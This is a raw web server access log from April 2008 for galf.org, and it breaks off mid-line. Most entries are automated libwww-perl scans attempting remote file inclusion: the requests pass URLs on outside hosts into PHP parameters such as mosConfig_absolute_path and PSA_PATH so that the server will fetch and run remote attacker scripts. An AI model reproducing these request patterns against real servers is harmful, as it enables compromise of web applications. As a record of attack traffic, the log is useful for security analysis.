85.214.109.12 - - [27/Apr/2008:18:54:15 -0700] "GET /logs/access_070903.log//impex/ImpExData.php?systempath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:18:54:41 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:54:46 -0700] "GET /logs/access.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:18:54:52 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.51.45 - - [27/Apr/2008:18:55:45 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.51.45 - - [27/Apr/2008:18:55:45 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:55:48 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.227.208.240 - - [27/Apr/2008:18:58:18 -0700] "GET //mcf.php?content=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.6.11.251 - - [27/Apr/2008:18:58:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.90 - - [27/Apr/2008:18:58:52 -0700] "GET /logs/access.log HTTP/1.0" 200 127456 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.82.99.126 - - [27/Apr/2008:18:59:50 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rhowners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.82.99.126 - - [27/Apr/2008:18:59:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rhowners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.82.99.126 - - [27/Apr/2008:18:59:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rhowners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:59:56 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:59:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:19:00:43 -0700] "GET /logs/access_071210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:19:01:04 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.179.90.54 - - [27/Apr/2008:19:01:04 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.179.90.54 - - [27/Apr/2008:19:01:04 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
216.227.208.240 - - [27/Apr/2008:19:01:10 -0700] "GET //mcf.php?content=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:19:01:13 -0700] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:19:01:14 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb